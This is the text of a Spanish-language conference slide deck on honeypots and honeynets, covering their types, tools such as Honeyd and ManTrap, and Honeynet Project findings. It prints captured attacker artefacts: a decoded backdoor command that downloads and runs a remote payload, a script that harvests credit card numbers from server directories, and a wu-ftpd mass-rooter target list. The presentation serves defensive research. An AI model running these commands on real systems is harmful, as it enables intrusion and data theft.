Tarros de miel y redes
trampa
El Ponente
Consultor de Seguridad en Germinus
Miembro del grupo HIS
Desarrollador de software libre
Miembro del proyecto Debian
Autor del Manual de Seguridad de Debian
Desarrollador principal de Tiger
Colaborador en el desarrollo de Bastille y
Nessus (entre otros)
Propósito
Mostrar qué son los tarros de miel y las
redes trampa, para qué sirven y qué
aportan a la ingeniería de seguridad.
Resumen
El problema
Definición y tipos de los tarros de miel
Introducción a las redes trampa
Ejemplos de redes trampa
Descubrimientos
Recursos
El problema
El problema
Las organizaciones son objetivos
estáticos, no se “mueve” y todo el mundo
sabe dónde están.
Los “malos” tienen la iniciativa. Tienen
recursos ilimitados y pueden atacarte
cuando quieran, como quieran.
Solución Tradicional
Proteger su red lo mejor que pueda.
Esperar y desear que detecte cuando se
produce un fallo.
Iniciativa
Los tarros de miel y las redes trampa
pueden dar la iniciativa.
Motivos e intenciones
J4ck: why don't you start charging for packet attacks?
J4ck: "give me x amount and I'll take bla bla offline
for this amount of time”
J1LL: it was illegal last I checked
J4ck: heh, then everything you do is illegal. Why not
make money off of it?
J4ck: I know plenty of people that'd pay exorbatent
amounts for packeting
Descubrimiento de nuevas
herramientas
Definición de los tarros de miel
(o PED)
Historia
1990
The Cuckoo’s Egg
Una noche con Berferd
1997
1998
1999
2001
-
Deception Toolkit
NetFacade y CyberCop Sting
El proyecto Honeynet
Capturas de gusanos
Definición
Recursos de seguridad cuyo valor reside en
ser sondeados, atacados o
comprometidos.
Concepto
Recursos que no tienen servicios en
producción ni uso autorizado.
Lo más probable es que cualquier
conexión sea una sonda o un ataque,
cualquier uso es no autorizado.
Una herramienta, no una
solución
Los tarros de miel son muy flexibles, son
de muchas formas y tamaños.
No se diseñan para un problema
específico.
Puede utilizarse para distintos propósitos.
Ventajas
Información valiosa
Número reducido de falsos positivos
Número reducido de falsos negativos
Concepto simple
No exige muchos recursos
Retorno de la inversión
Desventajas
Riesgo
Punto de vista limitado
No protege sistemas vulnerables
Tipos de tarros de miel
Producción
Incrementa la seguridad en su red:
protección, detección y respuesta
Investigación
Utilizada para recoger información
Alerta temprana y predicción de ataques
Nivel de interacción
Los objetivos de los tarros de miel son
distintos.
La funcionalidad depende de sus objetivos.
Cuanto más pueda hacer un atacante en un
tarro de miel, mayor es el nivel de
interacción.
Nivel de interacción.
A mayor interacción más se puede conocer
sobre el atacante.
Cuanto mayor la interacción, mayor el riesgo.
Los tarros de miel de producción suelen tener
baja interacción mientras que las de
investigación tienen alta interacción.
Niveles
Bajo – Emula servicios. Ejemplos:
BackOfficer Friendly o Honeyd.
Medio – Acceso limitado a un sistema
operativo controlado. Ejemplo: entorno
chroot o de jaula.
Alto – Acceso a un sistema operativo
totalmente funcional. Ejemplo: ManTrap o las
redes trampa.
¿Cual es mejor?
¡Ninguno!
Tienen todas ventajas y
desventajas. Depende en lo que se quiera
conseguir.
Baja interacción
Emula vulnerabilidades: Un atacante está
limitado a interactuar con los servicios que
se ofrezcan, y el nivel de funcionalidad
que se le de a éstos.
Utilizado fundamentalmente para detectar o
confundir.
Captura de información limitada.
Emulación de servidor de
FTP
case $incmd_nocase in
QUIT* )
echo -e "221 Goodbye.\r"
exit 0;;
SYST* )
echo -e "215 UNIX Type: L8\r"
;;
HELP* )
echo -e "214-The following commands are recognized (* =>'s unimplemented).\r"
echo -e "
USER
PORT
STOR
MSAM*
RNTO
NLST
MKD
CDUP\r"
echo -e "
PASS
PASV
APPE
MRSQ*
ABOR
SITE
XMKD
XCUP\r"
echo -e "
ACCT*
TYPE
MLFL*
MRCP*
DELE
SYST
RMD
STOU\r"
echo -e "
SMNT*
STRU
MAIL*
ALLO
CWD
STAT
XRMD
SIZE\r"
echo -e "
REIN*
MODE
MSND*
REST
XCWD
HELP
PWD
MDTM\r"
echo -e "
QUIT
RETR
MSOM*
RNFR
LIST
NOOP
XPWD\r"
echo -e "214 Direct comments to ftp@$domain.\r"
;;
USER* )
parm1_nocase=`echo $parm1 | gawk '{print toupper($0);}'`
if [ "$parm1_nocase" == "ANONYMOUS" ]
then
echo -e "331 Guest login ok, send your complete e-mail address as a password.\r"
AUTH="ANONYMOUS"
else
echo -e "331 Password required for $parm1\r"
AUTH=$parm1
fi
;;
Alta interacción
Ofrece un sistema operativo completo
para que el atacante interactúe con él.
Usado principalmente para investigación y
respuesta, pero también puede ser utilizado
para prevención y detección.
Complejas de desplegar, pero potencialmente
más seguro que las jaulas
Captura gran cantidad de información.
NO emula
Valor de redes trampa de
producción
Protección
Detección
Respuesta
Valor de redes trampa de
investigación
Recogida de inteligencia
Predicción y Alerta Temprana
Ejemplos
Redes Trampa de
producción
BackOfficer Friendly
LaBrea Tarpit
Deception Toolkit
Smoke Detector
Specter
Honeyd
Specter
Honeyd.conf
create default
set default personality "FreeBSD 2.2.1-STABLE"
set default default tcp action reset
add default tcp port 80 "sh /etc/Honeyd/scripts/web.sh"
add default tcp port 22 "sh /etc/Honeyd/scripts/test.sh"
add default tcp port 113 open
add default tcp port 1 reset
create windows
set windows personality "Windows NT 4.0 Server SP5-SP6"
set windows default tcp action reset
add windows tcp port 80 ”perl /etc/Honeyd/scripts/iis/main.pl"
add windows tcp port 25 block
add windows tcp port 23 proxy real-server.tracking-hackers.com:23
add windows tcp port 22 proxy $ipsrc:22
set windows uptime 3284460
bind 192.168.1.200 windows
Nmap.prints
# Contributed by Vilius [email protected]
Fingerprint Windows NT 4.0 Server SP5-SP6
TSeq(Class=RI%gcd=<8%SI=<11784E&>2CA4)
T1(DF=Y%W=2017%ACK=S++%Flags=AS%Ops=MNWNNT)
T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T3(Resp=Y%DF=Y%W=2017%ACK=O%Flags=A%Ops=NNT)
T4(DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(DF=N%W=0%ACK=S++%Flags=AR%Ops=)
PU(DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=
134%DAT=E)
¿Un router Cisco?
Tarros de miel de
investigación
ManTrap
Redes trampa
ManTrap
Sistema Operativo Host
Jaula 1
Jaula 2
Jaula 3
Jaula 4
Repetición de sesión
Red Trampa (Honeynet)
Tarro de miel OpenSource.
Se trata de una arquitectura, no es ni un
producto ni ningún software concreto.
Poblada de sistemas “vivos”.
GenII Honeynet
Control de Datos - GenII
alert tcp $HONEYNET any -> any 53
(msg:"DNS EXPLOIT named";flags: A+;
content:"|CD80 E8D7 FFFFFF|/bin/sh";
replace:"|0000 E8D7 FFFFFF|/ben/sh";)
http://www.snort.org
Redes trampas virtuales
Desplegando tarros de
miel
Tarros de miel distribuidos
Tarros de miel wireless
Descubrimientos
El proyecto Honeynet
Una organización de voluntarios
dedicados a la investigación de riesgos
cibernéticos.
Desplegando redes a lo largo del
planeta para que sean atacadas
¿Quién soy yo?
Mass-rooter
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Caldera eDesktop|OpenLinux 2.3 update[wu-ftpd-2.6.1-13OL.i386.rpm]
Debian potato [wu-ftpd_2.6.0-3.deb]
Debian potato [wu-ftpd_2.6.0-5.1.deb]
Debian potato [wu-ftpd_2.6.0-5.3.deb]
Debian sid [wu-ftpd_2.6.1-5_i386.deb]
Immunix 6.2 (Cartman) [wu-ftpd-2.6.0-3_StackGuard.rpm]
Immunix 7.0 (Stolichnaya) [wu-ftpd-2.6.1-6_imnx_2.rpm]
Mandrake 6.0|6.1|7.0|7.1 update [wu-ftpd-2.6.1-8.6mdk.i586.rpm]
Mandrake 7.2 update [wu-ftpd-2.6.1-8.3mdk.i586.rpm]
Mandrake 8.1 [wu-ftpd-2.6.1-11mdk.i586.rpm]
RedHat 5.0|5.1 update [wu-ftpd-2.4.2b18-2.1.i386.rpm]
RedHat 5.2 (Apollo) [wu-ftpd-2.4.2b18-2.i386.rpm]
RedHat 5.2 update [wu-ftpd-2.6.0-2.5.x.i386.rpm]
RedHat 6.? [wu-ftpd-2.6.0-1.i386.rpm]
RedHat 6.0|6.1|6.2 update [wu-ftpd-2.6.0-14.6x.i386.rpm]
RedHat 6.1 (Cartman) [wu-ftpd-2.5.0-9.rpm]
RedHat 6.2 (Zoot) [wu-ftpd-2.6.0-3.i386.rpm]
RedHat 7.0 (Guinness) [wu-ftpd-2.6.1-6.i386.rpm]
RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm]
RedHat 7.2 (Enigma) [wu-ftpd-2.6.1-18.i386.rpm]
SuSE 6.0|6.1 update [wuftpd-2.6.0-151.i386.rpm]
SuSE 6.0|6.1 update wu-2.4.2 [wuftpd-2.6.0-151.i386.rpm]
SuSE 6.2 update [wu-ftpd-2.6.0-1.i386.rpm]
SuSE 6.2 update [wuftpd-2.6.0-121.i386.rpm]
SuSE 6.2 update wu-2.4.2 [wuftpd-2.6.0-121.i386.rpm]
SuSE 7.0 [wuftpd.rpm]
SuSE 7.0 wu-2.4.2 [wuftpd.rpm]
SuSE 7.1 [wuftpd.rpm]
SuSE 7.1 wu-2.4.2 [wuftpd.rpm]
SuSE 7.2 [wuftpd.rpm]
SuSE 7.2 wu-2.4.2 [wuftpd.rpm]
SuSE 7.3 [wuftpd.rpm]
SuSE 7.3 wu-2.4.2 [wuftpd.rpm]
Nuevas tácticas - puertas
traseras
02/19-04:34:10.529350 206.123.208.5 -> 172.16.183.2
PROTO011 TTL:237 TOS:0x0 ID:13784 IpLen:20 DgmLen:422
02 00 17 35 B7 37 BA 3D B5 38 BB F2 36 86 BD 48 ...5.7.=.8..6..H
D3 5D D9 62 EF 6B A2 F4 2B AE 3E C3 52 89 CD 57 .].b.k..+.>.R..W
DD 69 F2 6C E8 1F 8 E 29 B4 3B 8C D2 18 61 A9 F6 .i.l...).;...a..
3B 84 CF 18 5D A5 EC 36 7B C4 15 64 B3 02 4B 91 ;...]..6{..d..K.
0E 94 1A 51 A6 DD 23 AE 32 B8 FF 7C 02 88 CD 58 ...Q..#.2..|...X
D6 67 9E F0 27 A1 1C 53 99 24 A8 2F 66 B8 EF 7A .g..'..S.$./f..z
F2 7B B2 F6 85 12 A3 20 57 D4 5A E0 25 B0 2E BF .{..... W.Z.%...
F6 48 7F C4 0A 95 20 AA 26 AF 3C B8 EF 41 78 01 .H.... .&.<..Ax.
85 BC 00 89 06 3D BA 40 C6 0B 96 14 A5 DC 67 F2 .....=.@......g.
7C F8 81 0E 8A DC F3 0A 21 38 4F 66 7D 94 AB C2 |.......!8Of}...
D9 F0 07 1E 35 4C 63 7A 91 A8 BF D6 ED 04 1B 32 ....5Lcz.......2
49 60 77 8E A5 BC D3 EA 01 18 2F 46 5D 74 8B A2 I`w......./F]t..
B9 D0 E7 FE 15 2C 43 5A 71 88 9F B6 CD E4 FB 12 .....,CZq.......
29 40 57 6E 85 9C B3 CA E1 F8 0F 26 3D 54 6B 82 )@Wn.......&=Tk.
99 B0 C7 DE F5 0C 23 3A 51 68 7F 96 AD C4 DB F2 ......#:Qh......
09 20 37 4E 65 7C 93 AA C1 D8 EF 06 1D 34 4B 62 . 7Ne|.......4Kb
79 90 A7 BE D5 EC 03 1A 31 48 5F 76 8D A4 BB D2 y.......1H_v....
E9 00 17 2E 45 5C 73 8A A1 B8 CF E6 FD 14 2B 42 ....E\s.......+B
59 70 87 9E B5 CC E3 FA 11 28 3F 56 6D 84 9B B2 Yp.......(?Vm...
C9 E0 F7 0E 25 3C 53 6A 81 98 AF C6 DD F4 0B 22 ....%<Sj......."
39 50 67 7E 95 AC C3 DA F1 08 1F 36 4D 64 7B 92 9Pg~.......6Md{.
A9 C0 D7 EE 05 1C 33 4A 61 78 8F A6 BD D4 EB 02 ......3Jax......
19 30 47 5E 75 8C A3 BA D1 E8 FF 16 2D 44 5B 72 .0G^u.......-D[r
89 A0 B7 CE E5 FC 13 2A 41 58 6F 86 9D B4 CB E2 .......*AXo.....
F9 10 27 3E 55 6C 83 9A B1 C8 DF F6 0D 24 3B 52 ..'>Ul.......$;R
69 80
i.
Orden descifrada de la puerta
trasera
starting decode of packet size 420
17 35 B7 37 BA 3D B5 38 BB F2 36 86
local buf of size 420
00 07 6B 69 6C 6C 61 6C 6C 20 2D 39
65 72 76 65 20 3B 20 6C 79 6E 78 20
72 63 65 20 68 74 74 70 3A 2F 2F 31
36 38 2E 31 30 33 2E 32 3A 38 38 38
6F 20 3E 20 2F 74 6D 70 2F 66 6F 6F
20 3B 20 63 64 20 2F 74 6D 70 20 3B
20 2D 78 76 7A 66 20 66 6F 6F 2E 74
20 2E 2F 74 74 73 65 72 76 65 20 3B
2D 72 66 20 66 6F 6F 2E 74 67 7A 20
72 76 65 3B 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00
B1 91 00 83 6A A6 39 05 B1 BF E7 6F
C5 FE 24 05 00 00 00 00 00 00 00 00
BD 48 D3 5D
20
2D
39
32
2E
20
67
20
74
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
BF
00
74
73
32
2F
74
74
7A
72
74
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
1D
00
74
6F
2E
66
67
61
20
6D
73
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
88
00
73
75
31
6F
7A
72
3B
20
65
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
CB
00
..killall -9 tts
erve ; lynx -sou
rce http://192.1
68.103.2:8882/fo
o > /tmp/foo.tgz
; cd /tmp ; tar
-xvzf foo.tgz ;
./ttserve ; rm
-rf foo.tgz ttse
rve;............
................
................
................
................
................
................
................
................
................
................
................
................
................
................
................
....j.9....o....
..$.............
Motivos
#!/bin/sh
echo " Caut carti de credit si incerc sa salvez in card.log"
touch /dev/ida/.inet/card.log
egrep -ir 'mastercard|visa' /home|egrep -v cache >>card.log
egrep -ir 'mastercard|visa' /var|egrep -v cache >>card.log
egrep -ir 'mastercard|visa' /root|egrep -v cache >>card.log
if [ -d /www ]; then
egrep -ir 'mastercard|visa' /www >>card.log
fi
Predicción y alerta
temprana
Resumen
Los tarros de miel y las redes trampa son
un elemento de investigación interesante
No sirven para proteger sistemas
inseguros
Pero son un nuevo elemento que ayuda a
la investigación de problemas de
seguridad y detección de ataques
Fuentes - Libros
 Know Your Enemy
http://www.honeynet.org/book/
Honeypots: Tracking Hackers
http://www.tracking-hackers.com/book/
Fuentes - Sitios Web
http://www.tracking-hackers.com
http://www.honeynet.org
http://his.sourceforge.net
http://www.nfr.net/products/bof
http://www.citi.umich.edu/u/provos/honeyd/
http://www.all.net/dtk
http://www.specter.com
http://www.mantrap.com
Fuentes - Publicaciones
Honeypots: Definitions and Values
http://www.spitzner.net/honeypots.html
Honeynets
http://www.honeynet.org/papers/honeynet/
Virtual Honeynets
http://www.honeynet.org/papers/virtual/
Muchos traducidos en
http://his.sourceforge.net/honeynet/papers/
Recursos - Listas de
correo
Lista de correo de tarros de miel
http://www.securityfocus.com/popups/forums/honeypots/faq.shtml
Lista de correo Firewall Wizards
http://www.nfr.net/mailman/listinfo/firewall-wizards
Lista de correo proyecto HIS (en español)
https://lists.sourceforge.net/lists/listinfo/his-discusion
Contacto
<[email protected]>
http://his.sourceforge.net
http://www.tracking-hackers.com
¿?
Descargar

No Slide Title